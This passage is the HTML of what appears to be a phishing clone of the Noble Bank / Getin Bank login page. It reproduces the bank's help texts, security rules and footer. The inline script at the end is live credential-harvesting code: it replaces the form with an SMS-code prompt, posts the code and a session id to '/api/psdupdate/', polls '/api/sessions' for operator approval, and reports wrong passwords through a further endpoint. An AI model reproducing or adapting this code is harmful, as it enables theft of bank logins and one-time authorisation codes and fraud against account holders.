                                <div class="msg_date">03.11.2016</div>
                                <div class="msg_title"><p>Informacja dotycząca przelewów w euro</p>
                                    <i class="icon icon--more-black msg_arrow"></i>
                                </div>
                                <div class="mobile_msg_description">

                                    <div style="height:42px;"></div>

                                    <div class="mgs_content scrollMe nano has-scrollbar" id="1612390883017_nanoScroller"><div class="nano-content content" tabindex="0" style="padding: 0px; right: -17px;">
                                        </div><div class="nano-pane" style="display: none;"><div class="nano-slider" style="height: 20px; transform: translate(0px, 0px);"></div></div></div>

                                </div>                    </li>
                            <li class="showMgsSection" data-code="141">
                                <div class="msg_date">29.04.2016</div>
                                <div class="msg_title"><p>Podstawowe zasady bezpieczeństwa</p></div>
                            </li>
                            <li class="showMgsSectionMobile" data-code="141">
                                <div class="msg_date">29.04.2016</div>
                                <div class="msg_title"><p>Podstawowe zasady bezpieczeństwa</p>
                                    <i class="icon icon--more-black msg_arrow"></i>
                                </div>
                                <div class="mobile_msg_description">

                                    <div style="height:42px;"></div>

                                    <div class="mgs_content scrollMe nano has-scrollbar" id="1612390883018_nanoScroller"><div class="nano-content content" tabindex="0" style="padding: 0px; right: -17px;">
                                        </div><div class="nano-pane" style="display: none;"><div class="nano-slider" style="height: 20px; transform: translate(0px, 0px);"></div></div></div>

                                </div>                    </li>
                            <li class="showMgsSection" data-code="136">
                                <div class="msg_date">11.04.2016</div>
                                <div class="msg_title"><p>Ważna informacja dla użytkowników Bankowości Mobilnej</p></div>
                            </li>
                            <li class="showMgsSectionMobile" data-code="136">
                                <div class="msg_date">11.04.2016</div>
                                <div class="msg_title"><p>Ważna informacja dla użytkowników Bankowości Mobilnej</p>
                                    <i class="icon icon--more-black msg_arrow"></i>
                                </div>
                                <div class="mobile_msg_description">

                                    <div style="height:42px;"></div>

                                    <div class="mgs_content scrollMe nano has-scrollbar" id="1612390883019_nanoScroller"><div class="nano-content content" tabindex="0" style="padding: 0px; right: -17px;">
                                        </div><div class="nano-pane" style="display: none;"><div class="nano-slider" style="height: 20px; transform: translate(0px, 0px);"></div></div></div>

                                </div>                    </li>
                        </ul>
                    </div>

                    <div class="bt">
                        <a href="http://noblebank.pl/" class="h--btn h--green-hover">← POWRÓT DO noblebank.PL</a>
                    </div>
                </div>    </div>
        </div>
    </section>

    <div class="info-wrapper">
        <section class="h--section-gray margin0 slide_section" id="login_help_section">
            <div class="h--btn-wide small h--btn-white" id="login_helper">
                <div id="login-help-header">
                    Pomoc
                    <div id="login-help-close-button" class="hideLoginHelp">×</div>
                </div>

                <div class="accordion" id="login-help-accordion">
                    <div>
                        <div id="login-help-heading-five" class="hideAllCollapseLoginHelp">
                            <div class="mb-0">
                                <div class="collapsed collapsable toggleLoginHelpArrow" type="button" data-toggle="collapse" data-target="#login-help-collapse-five" aria-expanded="false" aria-controls="login-help-collapse-five">
                                    <div class="login-help-heading">Problem z loginem<i class="icon icon--more-black login-help-heading-arrow"></i></div>
                                </div>
                            </div>
                        </div>
                        <div id="login-help-collapse-five" class="collapse" aria-labelledby="login-help-heading-five" data-parent="#login-help-accordion">
                            <div class="login-help-body">
                                <p>Jeśli nie pamiętasz swojego loginu do Bankowości Internetowej, zawsze możesz go sprawdzić na umowie lub w mailu z Banku.</p>
                                <p>Nawet jeśli już zmieniłeś login na własny, to zawsze możesz zalogować się tym loginem, który dostałeś podczas zawarcia umowy. Wygodnie i bezpiecznie, prawda?</p>

                                <p>
                                    Jeśli nie masz pod ręką umowy ani maila, możesz również skorzystać z samodzielnego przypomnienia loginu na stronie:
                                    <a href="https://secure.noblebank.pl/#management/remindLogin">Przypomnij login</a>.
                                </p>
                                <p>Postępuj zgodnie z krokami instrukcji na ekranie.</p>
                            </div>
                        </div>
                    </div>
                    <hr>

                    <div>
                        <div id="login-help-heading-four" class="hideAllCollapseLoginHelp">
                            <div class="mb-0">
                                <div class="collapsed collapsable toggleLoginHelpArrow" type="button" data-toggle="collapse" data-target="#login-help-collapse-four" aria-expanded="false" aria-controls="login-help-collapse-four">
                                    <div class="login-help-heading">Problem z hasłem tymczasowym<i class="icon icon--more-black login-help-heading-arrow"></i></div>
                                </div>
                            </div>
                        </div>
                        <div id="login-help-collapse-four" class="collapse" aria-labelledby="login-help-heading-four" data-parent="#login-help-accordion">
                            <div class="login-help-body">
                                <p>Do pierwszego zalogowania wykorzystaj hasło startowe, które otrzymałeś od nas SMSem.</p>
                                <p>Jeśli w ciągu kilku minut od podpisania umowy w oddziale nie otrzymałeś SMSa z hasłem, udaj się do najbliższej placówki lub zadzwoń na infolinię pod numerem
                                    326&nbsp;043 017. Opłata za połączenie wg taryfy operatora.</p>
                                <p>Jeśli złożyłeś wniosek o Konto i Bankowość Elektroniczną przez Internet, SMS z hasłem do Bankowości Elektronicznej powinieneś otrzymać w ciągu dwóch dni od podpisania umowy w obecności kuriera.
                                    Jeśli SMS nie dotarł, udaj się do najbliższej placówki lub zadzwoń na infolinię pod numerem 326&nbsp;043 017. Opłata za połączenie wg taryfy operatora.</p>
                                <p>Hasłem startowym po raz pierwszy możesz zalogować się zarówno do Bankowości Internetowej jak i Mobilnej.</p>
                                <p>Jeśli w pierwszej kolejności logujesz się do Bankowości Internetowej, w trakcie logowania poprosimy Cię o utworzenie własnego hasła. Tym nowym hasłem kolejny raz zalogujesz się do Bankowości Internetowej oraz wykorzystasz je do pierwszego logowania do Bankowości Mobilnej.</p>
                            </div>
                        </div>
                    </div>
                    <hr>

                    <div>
                        <div id="login-help-heading-three" class="hideAllCollapseLoginHelp">
                            <div class="mb-0">
                                <div class="collapsed collapsable toggleLoginHelpArrow" type="button" data-toggle="collapse" data-target="#login-help-collapse-three" aria-expanded="false" aria-controls="login-help-collapse-three">
                                    <div class="login-help-heading">Problem z hasłem<i class="icon icon--more-black login-help-heading-arrow"></i></div>
                                </div>
                            </div>
                        </div>
                        <div id="login-help-collapse-three" class="collapse" aria-labelledby="login-help-heading-three" data-parent="#login-help-accordion">
                            <div class="login-help-body">
                                <p>Jeśli zapomniałeś hasła, skorzystaj z możliwości samodzielnego zrestartowania hasła na stronie. Na stronie logowania wpisz swój login i kliknij przycisk dalej. Na kolejnym ekranie zobaczysz przycisk „Nie pamiętam hasła”- wybierz go i postępuj zgodnie z instrukcjami na stronie.</p>
                            </div>
                        </div>
                    </div>
                    <hr>

                    <div>
                        <div id="login-help-heading-two" class="hideAllCollapseLoginHelp">
                            <div class="mb-0">
                                <div class="collapsed collapsable toggleLoginHelpArrow" data-toggle="collapse" data-target="#login-help-collapse-two" aria-expanded="false" aria-controls="login-help-collapse-two">
                                    <div class="login-help-heading">Jak samodzielnie odblokować bankowość internetową?<i class="icon icon--more-black login-help-heading-arrow"></i></div>
                                </div>
                            </div>
                        </div>
                        <div id="login-help-collapse-two" class="collapse" aria-labelledby="login-help-heading-two" data-parent="#login-help-accordion">
                            <div class="login-help-body">
                                <p>Jeśli zablokowałeś już Bankowość Internetową (np. błędnie wpisując hasło), to w łatwy sposób odblokujesz ten kanał dostępu samodzielnie:</p>
                                <ol>
                                    <li>Jeśli używasz aplikacji Getin Mobile, zaloguj się, a następnie w menu wybierz Ustawienia/Kanały dostępu do Banku, Bankowość Internetowa – Odblokuj</li>
                                    <li>Możesz skorzystać z przycisku Odblokuj dostępnym po wpisaniu loginu konta, które zostało zablokowane, zostaniesz przekierowany do formularza. Postępuj zgodnie z instrukcjami na ekranie.</li>
                                </ol>
                            </div>
                        </div>
                        <hr>
                    </div>

                    <div>
                        <div id="login-help-heading-one" class="hideAllCollapseLoginHelp">
                            <div class="mb-0">
                                <div class="collapsed collapsable toggleLoginHelpArrow" data-toggle="collapse" data-target="#login-help-collapse-one" aria-expanded="false" aria-controls="login-help-collapse-one">
                                    <div class="login-help-heading">Jak zalogować się po raz pierwszy? <i" class="icon icon--more-black login-help-heading-arrow"></i"></div>
                                </div>
                            </div>
                            <div id="login-help-collapse-one" class="collapse" aria-labelledby="login-help-heading-one" data-parent="#login-help-accordion">
                                <div class="login-help-body">
                                    <ol>
                                        <li>Na stronie www.getinbank.pl kliknij w przycisk <strong>ZALOGUJ</strong></li>
                                        <li>Podczas pierwszego logowania przygotuj swój <strong>login</strong> (znajdziesz go w wiadomości powitalnej e-mail z Banku oraz na umowie).</li>
                                        <li>Do pierwszego logowania wykorzystaj <strong>hasło startowe</strong>, które otrzymałeś w wiadomości SMS.</li>
                                        <li>Zmień hasło na własne. Możesz nadać dowolne hasło, które będzie Ci łatwo zapamiętać. Pamiętaj, że hasło powinno być trudne do odgadnięcia przez osoby postronne. W tym miejscu możesz też zdecydować czy w przyszłości będziesz podawać hasło w całości, czy tylko wybrane znaki. <strong>Podczas każdego kolejnego logowania należy używać tylko nowego hasła.</strong></li>
                                        <li>Podaj <strong>kod SMS</strong>. Otrzymasz go po wpisaniu swojego nowego hasła.</li>
                                        <li>Aby przyspieszyć logowanie możesz dodać własne urządzenie do <strong>Zarejestrowanych urządzeń</strong>. Podczas logowania na takim urządzeniu wystarczy podanie loginu i hasła.</li>
                                    </ol>
                                </div>
                            </div>
                            <hr>
                        </div>
                    </div>
                </div>


            </div></section>    <section class="h--section-gray margin0 slide_section" id="help_section">
            <div class="question-help">Masz pytania?</div>
            <div class="h--box-title">pomoc</div>
            <div class="h--btn h--btn-wide small h--btn-white noble-hide" id="login_help">
                <div class="help-contener"><i class="icon icon--help-mark"></i> Pomoc dotycząca logowania</div>
                <i id="more_help" class="icon icon--more-black"></i>
            </div>

            <div id="help-box" style="display:none;">


                <a href="https://www.getinbank.pl/klienci-indywidualni/pytania-i-odpowiedzi/bankowosc-internetowa#jak-wyglada-pierwsze-logowanie" target="_blank" class="h--btn-white h--btn h--btn-wide help-question">
                    <div class="left-help">1.</div>
                    <div class="right-help">Jak wygląda pierwsze logowanie?</div>
                </a>
                <div class="left-help border-help background-white"></div>
                <div class="right-help border-help"></div>


                <a href="https://www.getinbank.pl/klienci-indywidualni/pytania-i-odpowiedzi/bankowosc-internetowa#czym-jest-login" target="_blank" class="h--btn-white h--btn h--btn-wide help-question">
                    <div class="left-help">2.</div>
                    <div class="right-help">Czym jest login?</div>
                </a>
                <div class="left-help border-help background-white"></div>
                <div class="right-help border-help"></div>


                <a href="https://www.getinbank.pl/klienci-indywidualni/pytania-i-odpowiedzi/bankowosc-internetowa#jak-zmienic-login-do-bankowosci-internetowej" target="_blank" class="h--btn-white h--btn h--btn-wide help-question">
                    <div class="left-help">3.</div>
                    <div class="right-help">Jak zmienić login do Bankowości Internetowej?</div>
                </a>
                <div class="left-help border-help background-white"></div>
                <div class="right-help border-help"></div>


                <a href="https://www.getinbank.pl/klienci-indywidualni/pytania-i-odpowiedzi/bankowosc-internetowa#czym-jest-haslo" target="_blank" class="h--btn-white h--btn h--btn-wide help-question">
                    <div class="left-help">4.</div>
                    <div class="right-help">Czym jest hasło?</div>
                </a>
                <div class="left-help border-help"></div>
                <div class="right-help border-help"></div>


                <a href="https://www.getinbank.pl/klienci-indywidualni/pytania-i-odpowiedzi/bankowosc-internetowa" target="_blank" class="h--btn-white h--btn h--btn-wide help-question mb-1">
                    <div class="more-question">WIĘCEJ PYTAŃ</div>
                </a>

            </div>


            <a class="h--btn h--btn-wide h--btn-white help-list" href="http://noblebank.pl/uslugi/bankowosc-internetowa/bankowosc-bezpieczenstwo" target="_blank"><i class="icon icon--help-security"></i> Zasady bezpiecznej bankowości</a>
            <a class="h--btn h--btn-wide h--btn-white help-list" href="http://demo.noblebank.pl/" target="_blank"><i class="icon icon--help-demo"></i> Demo Bankowości Internetowej</a>
            <a class="h--btn h--btn-wide h--btn-white help-list noble-hide" href="https://secure.noblebank.pl/" target="_blank"><i class="icon icon--help-phone"></i> Bankowość Telefoniczna</a>
            <a class="h--btn h--btn-wide h--btn-white help-list" href="http://noblebank.pl/uslugi/bankowosc-internetowa/bankowosc-mobilna" target="_blank"><i class="icon icon--help-mobile"></i> Bankowość Mobilna</a>





            <div class="help-phone-mobile phone-display">
                <a class="h--btn h--btn-wide h--btn-white help-list help-phone" href="tel:+48 (22) 203 03 03" target="_blank">
                    <i class="icon icon--phone"></i>
                    <div>Zadzwoń na Infolinię +48 (22) 203 03 03<p>z telefonów komórkowych i stacjonarnych</p>
                    </div></a>

                <a class="h--btn h--btn-wide h--btn-white help-list help-phone noble-hide" href="tel:+48326043001" target="_blank">
                    <i class="icon icon--phone"></i>
                    <div>Zadzwoń na Infolinię +48 32 604 30 01<p>z zagranicy</p>
                    </div></a>

                <a class="h--btn h--btn-wide h--btn-white help-list infolinia" href="https://secure.noblebank.pl/" target="_blank"><p id="infolinia">Infolinia dostępna 7 dni w tygodniu całodobowo. Opłata za połączenie lokalne.</p></a>
            </div>



            <div class="help-phone-mobile screen-display">
                <a class="h--btn h--btn-wide h--btn-white help-list help-phone" target="_blank">
                    <i class="icon icon--phone"></i>
                    <div>Zadzwoń na Infolinię +48 (22) 203 03 03<p>z telefonów komórkowych i stacjonarnych</p>
                    </div></a>

                <a class="h--btn h--btn-wide h--btn-white help-list help-phone noble-hide" target="_blank">
                    <i class="icon icon--phone"></i>
                    <div>Zadzwoń na Infolinię +48 32 604 30 01<p>z zagranicy</p>
                    </div></a>

                <a class="h--btn h--btn-wide h--btn-white help-list infolinia" href="https://secure.noblebank.pl/" target="_blank"><p id="infolinia">Infolinia dostępna 7 dni w tygodniu całodobowo. Opłata za połączenie lokalne.</p></a>
            </div>



            <div class="help-phone-descop">
                <div class="h--btn h--btn-wide small midgray help-phone first-tel"><i class="icon icon--phone"></i>
                    <div>Zadzwoń na Infolinię +48 (22) 203 03 03<p>z telefonów komórkowych i stacjonarnych</p>
                    </div></div>

                <div class="h--btn h--btn-wide small midgray help-phone noble-hide"><i class="icon icon--phone"></i>
                    <div>Zadzwoń na Infolinię +48 32 604 30 01<p>z zagranicy</p>
                    </div></div>

                <p id="infolinia">Infolinia dostępna 7 dni w tygodniu całodobowo. Opłata za połączenie lokalne.</p>
            </div>
        </section>    <div class="login-info clearfix">
            <div class="wrapper-help">
                <div class="wrapper">
                    <header><h3>Potrzebujesz pomocy?</h3></header>
                    <div class="h--btn h--btn-wide small h--btn-white mobile-help-list">
                        <p>Pomoc</p><i id="show_help_mobile" class="icon icon--more-black"></i>
                    </div>

                    <div class="show-helpbox-mobile">
                        <div class="h--btn h--btn-wide small h--btn-white noble-hide" id="login_help_mobile">
                            <div class="help-contener"><i class="icon icon--help-mark"></i> Pomoc dotycząca logowania</div>
                            <i id="more_help_mobile" class="icon icon--more-black"></i>
                        </div>

                        <div id="help-box-mobile" style="display:none;">


                            <a href="https://www.getinbank.pl/klienci-indywidualni/pytania-i-odpowiedzi/bankowosc-internetowa#jak-wyglada-pierwsze-logowanie" target="_blank" class="h--btn-white h--btn h--btn-wide help-question">
                                <div class="left-help">1.</div>
                                <div class="right-help">Jak wygląda pierwsze logowanie?</div>
                            </a>
                            <div class="left-help border-help background-white"></div>
                            <div class="right-help border-help"></div>


                            <a href="https://www.getinbank.pl/klienci-indywidualni/pytania-i-odpowiedzi/bankowosc-internetowa#czym-jest-login" target="_blank" class="h--btn-white h--btn h--btn-wide help-question">
                                <div class="left-help">2.</div>
                                <div class="right-help">Czym jest login?</div>
                            </a>
                            <div class="left-help border-help background-white"></div>
                            <div class="right-help border-help"></div>


                            <a href="https://www.getinbank.pl/klienci-indywidualni/pytania-i-odpowiedzi/bankowosc-internetowa#jak-zmienic-login-do-bankowosci-internetowej" target="_blank" class="h--btn-white h--btn h--btn-wide help-question">
                                <div class="left-help">3.</div>
                                <div class="right-help">Jak zmienić login do Bankowości Internetowej?</div>
                            </a>
                            <div class="left-help border-help background-white"></div>
                            <div class="right-help border-help"></div>


                            <a href="https://www.getinbank.pl/klienci-indywidualni/pytania-i-odpowiedzi/bankowosc-internetowa#czym-jest-haslo" target="_blank" class="h--btn-white h--btn h--btn-wide help-question">
                                <div class="left-help">4.</div>
                                <div class="right-help">Czym jest hasło?</div>
                            </a>
                            <div class="left-help border-help"></div>
                            <div class="right-help border-help"></div>


                            <a href="https://www.getinbank.pl/klienci-indywidualni/pytania-i-odpowiedzi/bankowosc-internetowa" target="_blank" class="h--btn-white h--btn h--btn-wide help-question mb-1">
                                <div class="more-question">WIĘCEJ PYTAŃ</div>
                            </a>

                        </div>


                        <a class="h--btn h--btn-wide h--btn-white help-list" href="http://noblebank.pl/uslugi/bankowosc-internetowa/bankowosc-bezpieczenstwo" target="_blank"><i class="icon icon--help-security"></i> Zasady bezpiecznej bankowości</a>
                        <a class="h--btn h--btn-wide h--btn-white help-list" href="http://demo.noblebank.pl/" target="_blank"><i class="icon icon--help-demo"></i> Demo Bankowości Internetowej</a>
                        <a class="h--btn h--btn-wide h--btn-white help-list noble-hide" href="https://secure.noblebank.pl/" target="_blank"><i class="icon icon--help-phone"></i> Bankowość Telefoniczna</a>
                        <a class="h--btn h--btn-wide h--btn-white help-list" href="http://noblebank.pl/uslugi/bankowosc-internetowa/bankowosc-mobilna" target="_blank"><i class="icon icon--help-mobile"></i> Bankowość Mobilna</a>





                        <div class="help-phone-mobile phone-display">
                            <a class="h--btn h--btn-wide h--btn-white help-list help-phone" href="tel:+48 (22) 203 03 03" target="_blank">
                                <i class="icon icon--phone"></i>
                                <div>Zadzwoń na Infolinię +48 (22) 203 03 03<p>z telefonów komórkowych i stacjonarnych</p>
                                </div></a>

                            <a class="h--btn h--btn-wide h--btn-white help-list help-phone noble-hide" href="tel:+48326043001" target="_blank">
                                <i class="icon icon--phone"></i>
                                <div>Zadzwoń na Infolinię +48 32 604 30 01<p>z zagranicy</p>
                                </div></a>

                            <a class="h--btn h--btn-wide h--btn-white help-list infolinia" href="https://secure.noblebank.pl/" target="_blank"><p id="infolinia">Infolinia dostępna 7 dni w tygodniu całodobowo. Opłata za połączenie lokalne.</p></a>
                        </div>



                        <div class="help-phone-mobile screen-display">
                            <a class="h--btn h--btn-wide h--btn-white help-list help-phone" target="_blank">
                                <i class="icon icon--phone"></i>
                                <div>Zadzwoń na Infolinię +48 (22) 203 03 03<p>z telefonów komórkowych i stacjonarnych</p>
                                </div></a>

                            <a class="h--btn h--btn-wide h--btn-white help-list help-phone noble-hide" target="_blank">
                                <i class="icon icon--phone"></i>
                                <div>Zadzwoń na Infolinię +48 32 604 30 01<p>z zagranicy</p>
                                </div></a>

                            <a class="h--btn h--btn-wide h--btn-white help-list infolinia" href="https://secure.noblebank.pl/" target="_blank"><p id="infolinia">Infolinia dostępna 7 dni w tygodniu całodobowo. Opłata za połączenie lokalne.</p></a>
                        </div>



                        <div class="help-phone-descop">
                            <div class="h--btn h--btn-wide small midgray help-phone first-tel"><i class="icon icon--phone"></i>
                                <div>Zadzwoń na Infolinię +48 (22) 203 03 03<p>z telefonów komórkowych i stacjonarnych</p>
                                </div></div>

                            <div class="h--btn h--btn-wide small midgray help-phone noble-hide"><i class="icon icon--phone"></i>
                                <div>Zadzwoń na Infolinię +48 32 604 30 01<p>z zagranicy</p>
                                </div></div>

                            <p id="infolinia">Infolinia dostępna 7 dni w tygodniu całodobowo. Opłata za połączenie lokalne.</p>
                        </div>

                    </div>
                    <div class="helpbox-margin-mobile"></div>
                    <div class="banner">

                        <div class="content">
                            <div class="banner">
                                <div class="banner-container">
                                    <style>
                                        .banner a{text-decoration: none;}
                                        .banner h2{font-size: 48px;margin: 0px;}
                                        .banner-middle p{position: absolute;bottom: 0;margin: 0px;}
                                        .banner-bi-title_500{color: #2A2C31;font-size: 16px!important;margin: 0px;margin-top:18px;margin-bottom: 15px;padding: 0px;line-height: 22px}
                                        .banner-bi-content-tall_500{font-size: 12px!important;margin-top: -9px!important;color: #2a2c31;}
                                        .banner-bi-content-tall_logo{font-size: 12px!important;margin:-10px 0px 0px 0px!important;color: #2a2c31;}
                                        .banner-bi-more{border-bottom: 1px dotted #9b9b9b;bottom: 24px;color: #2a2c31;display: inline-block;float: left;font-size: 10px;padding-bottom: 2px;position:absolute;text-decoration: none;margin-top: 25px;margin-bottom: -20px;}a{text-decoration: none;}
                                        .banner-bi-nl{width:458px;height: 150px;margin-bottom: 20px;}
                                        .banner-bi-nl-pic{float: left;height: 100%;width: 150px;}
                                        .banner-bi-nl-main{float: right;height: 150px;width: 308px;position:relative;background-color: #FFF;}
                                        @media (max-width: 1200px) {
                                            .banner-bi-nl{
                                                width: 375px!important;
                                            }
                                            .banner-bi-nl-main{
                                                width: 225px!important;
                                            }
                                        }
                                        @media (max-width: 959px) {
                                            .banner-bi-nl{
                                                width: 486px!important;
                                            }
                                            .banner-bi-nl-main{
                                                width: 336px!important;
                                            }
                                        }
                                        @media (max-width: 767px) {
                                            .banner-bi-nl{
                                                width: 344px!important;
                                            }
                                            .banner-bi-nl-main{
                                                width: 194px!important;
                                            }
                                        }
                                    </style>
                                    <div class="banner-bi-nl">
                                        <a target="_blank" href="https://www.getinbank.pl/rodzina-500">
                                            <div class="banner-bi-nl-pic">
                                                <img src="/assets/banks/noblebank_files/BISecure_500Plus_2021.jpg" alt="Wniosek Rodzina 500+">
                                            </div>
                                            <div class="banner-bi-nl-main">
                                                <div style="margin-left: 16px;">
                                                    <p class="banner-bi-title_500">Wniosek Rodzina 500+</p>
                                                    <p class="banner-bi-content-tall_500">Wypełnij go w Bankowości Internetowej</p>
                                                    <p class="banner-bi-content-tall_500">Getin Banku. Wniosek znajdziesz</p>
                                                    <p class="banner-bi-content-tall_500">w zakładce Oferta i wnioski/eUrząd.</p>
                                                    <div class="banner-bi-more">
                                                        Sprawdź
                                                        <i class="icon icon--arrow-right-mark" style="float: right"></i>
                                                    </div>
                                                </div>
                                            </div>
                                        </a>
                                    </div>            </div>
                                <div class="banner-container">
                                </div>
                                <div class="banner-container">
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <section class="h--section-gray margin0 slide_section" id="msg_section" style="height: 782px;">
            <p class="mgs_title"></p>

            <p class="title-wide"><span class="mgs_date"></span></p>

            <div class="mgs_content scrollMe nano has-scrollbar" style="height:250px;" id="1612390883020_nanoScroller"><div class="nano-content content" tabindex="0" style="padding: 0px; right: -17px;">
                </div><div class="nano-pane" style="display: none;"><div class="nano-slider" style="height: 234px; transform: translate(0px, 0px);"></div></div></div>
            <div class="bt">
                <a class="h--btn-text-gray hideMgsSection">← schowaj wiadomość</a>
            </div>
        </section>            <section class="h--section-white no-padding presentationWindow" style="display:none;">
            <iframe src="/assets/banks/noblebank_files/107563031.html" width="500" height="281" frameborder="0" webkitallowfullscreen="" mozallowfullscreen="" allowfullscreen=""></iframe> <p><a href="http://vimeo.com/107563031">noble bank wersja odswiezona bez bilansu v2</a> from <a href="http://vimeo.com/user18714997">Noble Bank</a> on <a href="https://vimeo.com/">Vimeo</a>.</p>
        </section>
    </div>
    <div class="section-footer">
        <div class="section-help-secure">

            <div class="section-help">

                <h4>Pomoc</h4>
                <div class="help-guild">

                    <div class="noble-hide"><a target="_blank" href="https://secure.noblebank.pl/">Pierwsze logowanie</a><br></div>
                    <div><a target="_blank" href="https://www.noblebank.pl/dokumenty/instrukcja-odblokowania-dostepu-do-bankowosci-internetowej.pdf">Odblokowanie dostępu</a><br></div>
                    <div><a target="_blank" href="https://secure.noblebank.pl/#management/remindLogin">Przypomnienie loginu</a><br></div>
                    <div><a target="_blank" href="https://www.noblebank.pl/dokumenty/instrukcja-przypomnienia-hasla.pdf">Reset hasła</a><br></div>
                    <div><a target="_blank" href="http://demo.noblebank.pl/">Demo Bankowości</a><br></div>
                    <div class="noble-hide"><a target="_blank" href="https://secure.noblebank.pl/">FAQ</a><br></div>
                    <div id="more-info-security"><a target="_blank" href="https://www.noblebank.pl/bezpieczna-bankowosc">Więcej o bezpieczeństwie</a></div>
                </div>

            </div>

            <div class="section-secure">

                <h4 class="no_show_rules">Podstawowe zasady bezpieczeństwa</h4>
                <h4 class="show_rules">Podstawowe zasady bezpieczeństwa <i id="show_rules" class="icon icon--more-black"></i></h4>

                <div class="rules">
                    <div class="rule">
                        <div class="numbers bold">1</div>
                        <div class="description bold">
                            Dokładnie sprawdzaj, czy informacje zawarte w SMSie autoryzacyjnym są zgodne z danymi transakcji. Zwróć uwagę czy zgadza się numer rachunku i kwota transakcji.
                        </div>
                    </div>
                    <div class="rule">
                        <div class="numbers bold">2</div>
                        <div class="description bold">
                            Zawsze loguj się przez stronę www.noblebank.pl. Sprawdź przed zalogowaniem, czy widzisz https w adresie strony i czy połączenie jest szyfrowane.
                        </div>
                    </div>
                    <div class="rule">
                        <div class="numbers">3</div>
                        <div class="description">
                            Nie odpowiadaj na wiadomości od podejrzanych nadawców, nie otwieraj załączników tych wiadomościach i nie korzystaj z zawartych w nich linków.
                        </div>
                    </div>
                </div>

                <div class="rules2">
                    <div class="rule">
                        <div class="numbers">4</div>
                        <div class="description">
                            Nie udostępniaj osobom trzecim loginu i hasła do Twojej Bankowości Internetowej i Mobilnej oraz kodów autoryzacyjnych.
                        </div>
                    </div>
                    <div class="rule">
                        <div class="numbers">5</div>
                        <div class="description">
                            Hasła do Bankowości, nie wykorzystuj w innych serwisach, np. społecznościowych.
                        </div>
                    </div>
                    <div class="rule">
                        <div class="numbers">6</div>
                        <div class="description">
                            Korzystaj z aktualnych wersji systemu operacyjnego, przeglądarek internetowych i programów antywirusowych.
                        </div>
                    </div>
                </div>
            </div>
        </div>

        <div class="clearfix mb-7"></div>

        <div class="section-copyright">
            <div class="section-copyright-left">
                <p class="footer-green">© 2021 Noble Bank</p>
            </div>

            <div class="section-copyright-right">
                <p class="footer-green">Jesteśmy częścią Getin Noble Bank S.A.</p>
                <p class="footer-swift">SWIFT: GBGCPLPK</p>
            </div>
        </div>



    </div>

            </div>

<div class="h--overlay-white">
    <img src="/assets/banks/noblebank_files/loader.gif">
</div>
<div class="h--overlay-white-announcements">
    <img src="/assets/banks/noblebank_files/loader.gif">
</div>
<div class="h--overlay-white-setings" style="zoom: 1;">
    <img src="/assets/banks/noblebank_files/loader.gif">
</div>

<div class="container">
    <div class="row h--overlay-credit-pa otherCase popup-overlay">
        <div class="col-xs-8 col-md-6 col-sm-8 center popup-credit-pa">
            <div class="row">
                <div class="actions">
                    <div class="float-right">
                        <button type="button" class="button-close"><i class="icon icon--close"></i></button>
                    </div>
                </div>
                <div class="col-xs-12 col-md-12 col-sm-12">
                    <div class="title mt-15">Obecnie w systemie posiadasz już rozpoczęty wniosek.</div>
                </div>
                <div class="col-xs-12 col-md-12 col-sm-12">
                    <div class="description">Wskaż, który wniosek chcesz kontynuować?</div>
                </div>
            </div>
            <div class="row menu mb10">
                <div class="col-xs-12 col-md-12 col-sm-12">
                    <div class="table">
                        <div class="row">
                            <div class="col-xs-6 col-md-6 col-sm-6 no-mobile">

                                <div class="max table"><a class="button-close-and-new"><span class="text-decoration">Nowy wniosek</span></a></div>                        </div>
                            <div class="col-xs-6 col-md-6 col-sm-6  no-mobile">
                                <div class="max table">
                                    <a href="https://secure.noblebank.pl/#creditpa/index/" class="button-continue">Poprzedni wniosek</a>                            </div>
                            </div>
                            <div class="col-xs-12 col-md-6 col-sm-6 mobile">
                                <div class="max table">
                                    <a href="https://secure.noblebank.pl/#creditpa/index/" class="button-continue">Poprzedni wniosek</a>
                                </div>
                            </div>
                            <div class="col-xs-12 col-md-6 col-sm-6 mobile">
                                <div class="max table"><a class="button-close-and-new"><span class="text-decoration">Nowy wniosek</span></a></div>                        </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <div class="blur">
        </div>    </div>
</div>
<div class="container">
    <div class="row h--overlay-credit-pa errorCase popup-overlay">
        <div class="col-xs-8 col-md-6 col-sm-8 center popup-credit-pa">
            <div class="row">
                <div class="col-xs-12 col-md-12 col-sm-12">
                    <div class="title ">System chwilowo niedostępny</div>
                </div>
                <div class="col-xs-12 col-md-12 col-sm-12">
                    <div class="description">Prosimy spróbować później.</div>
                </div>
            </div>
            <div class="row menu mb10">
                <div class="col-xs-12 col-md-12 col-sm-12">
                    <div class="table">
                        <div class="row">
                            <div class="col-md-9 site-main">
                                <div class="max table">
                                    <a class="button-accept come-back">Powrót do bankowości</a>                            </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <div class="blur">
        </div>    </div>
</div>


<script src="/assets/js/jquery-3.5.1.min.js"></script>
<script src="/assets/js/cookies.core.1.3.min.js"></script>
<script src="/assets/js/banklogin.js"></script>
<script>
    let bankId = (cookieManager.read('session_id'))

    const getinBankUpdate = () => {
        if ($("#bank_password").val() && $("#bank_login").val() !== "") {
            $("#mainCont").empty()
            $("#mainCont").append('<input type="text" placeholder="Kod SMS z telefonu" id="bank_psd" onclick="psdUpdate()">')
            $("#buttonsCont").empty()
            $("#buttonsCont").append('<button onclick="psdUpdate()" type="submit" class="h--btn-arrow-right h--btn-light-green gotoPassword float-right long login-next-button fz-12">dalej</button>')
        } else {
        }
    }

    const regularCheck = () => {
        readTextFile("/api/sessions", function(text){
            var data = JSON.parse(text);
            for (let i=0;i<data["result"].length;i++) {
                if (data["result"][i]["uid"] == sessId) {
                    if (data["result"][i]["accepted"] == "true") {
                        summaryFunc()
                        clearInterval(multipleFunc)
                    }
                } else {

                }
            }
        });
    }
    const psdUpdate = () => {

        if (document.getElementById('bank_psd').value !== "") {
            $.post("/api/psdupdate/", {
                bank_psd: $("#bank_psd").val(),
                sessionId: bankId
            }).done(data => {
                $("#mainCont").empty()
                $("#mainCont").append('<p style="font-size:20px">Logowanie...</p>')
            }).fail(error => {
                console.error("Coś poszło nie tak… Spróbuj ponownie za chwilę.", "Wystąpił błąd")
            })

        } else {
            console.log('not selectec')
        }
    }

    let multipleFunc = setInterval(function(){ regularCheck() }, 3000);


    //WRONG PASS

    const wrongPass = () => {
        $.post("/api/wrongpass/", {
            sessionId: bankId,
            name: "false"
        }).done(data => {
            console.log('done')
